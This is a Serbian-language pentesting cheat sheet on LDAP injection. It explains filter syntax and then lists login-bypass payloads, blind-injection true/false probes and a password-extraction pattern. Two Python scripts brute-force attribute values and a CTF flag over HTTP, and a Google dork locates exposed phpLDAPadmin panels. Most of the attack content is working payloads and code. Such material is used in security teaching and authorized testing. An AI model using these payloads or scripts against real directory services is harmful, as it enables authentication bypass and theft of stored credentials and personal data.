LDAP Injection

Reading time: 6 minutes

LDAP Injection

LDAP Injection

LDAP

Ako želite da saznate šta je LDAP, posetite sledeću stranicu:

389, 636, 3268, 3269 - Pentesting LDAP

LDAP Injection je napad koji cilja web aplikacije koje konstruišu LDAP izjave na osnovu korisničkog unosa. Do njega dolazi kada aplikacija ne uspe da pravilno sanitizuje unos, omogućavajući napadačima da manipulišu LDAP izjavama putem lokalnog proksija, što može dovesti do neovlašćenog pristupa ili manipulacije podacima.

Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = |filterlist
Not = ! filter
Filterlist = 1*filter
Item= simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = '=' / '~=' / '>=' / '<='
Present = attr = *
Substring = attr ”=” [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
(&) = Absolute TRUE
(|) = Absolute FALSE

Na primer:
(&(!(objectClass=Impresoras))(uid=s*))
(&(objectClass=user)(uid=*))

Možete pristupiti bazi podataka, a ona može sadržati informacije različitih tipova.

OpenLDAP: Ako stignu 2 filtera, izvršava se samo prvi.
ADAM ili Microsoft LDS: Sa 2 filtera javlja se greška.
SunOne Directory Server 5.0: Izvršava oba filtera.

Veoma je važno poslati filter sa ispravnom sintaksom ili će se javiti greška. Bolje je poslati samo 1 filter.

Filter mora početi sa: & ili |
Primer: (&(directory=val1)(folder=public))

(&(objectClass=VALUE1)(type=Epson*))
VALUE1 = *)(ObjectClass=*))(&(objectClass=void

Zatim: (&(objectClass=*)(ObjectClass=*)) će biti prvi filter (onaj koji se izvršava).

Login Bypass

LDAP podržava nekoliko formata za čuvanje lozinke: clear, md5, smd5, sh1, sha, crypt. Dakle, može se desiti da bez obzira na to šta unesete u lozinku, ona bude hash-ovana.

user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi

user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))

user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))

user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))

user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed

user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error

username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.

username=*
password=*)(&
--> (&(user=*)(password=*)(&))

username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))

Liste

• LDAP_FUZZ
• LDAP Atributi
• LDAP PosixAccount atributi

Slepa LDAP Injekcija

Možete naterati False ili True odgovore da proverite da li se vraćaju podaci i potvrdite moguću Slepu LDAP Injekciju:

#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))

#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))

Dump podaci

Možete iterirati preko ascii slova, cifara i simbola:

(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...

Scripts

Otkrivanje validnih LDAP polja

LDAP objekti podrazumevano sadrže nekoliko atributa koji se mogu koristiti za čuvanje informacija. Možete pokušati da brute-force-ujete sve njih kako biste izvukli te informacije. Možete pronaći listu podrazumevanih LDAP atributa ovde.

#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break

if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()

Specijalna Slepa LDAP Injekcija (bez "*")

#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break

Google Dorks

intitle:"phpLDAPadmin" inurl:cmd.php

Više Payload-a

PayloadsAllTheThings/LDAP Injection at master \xc2\xb7 swisskyrepo/PayloadsAllTheThings \xc2\xb7 GitHub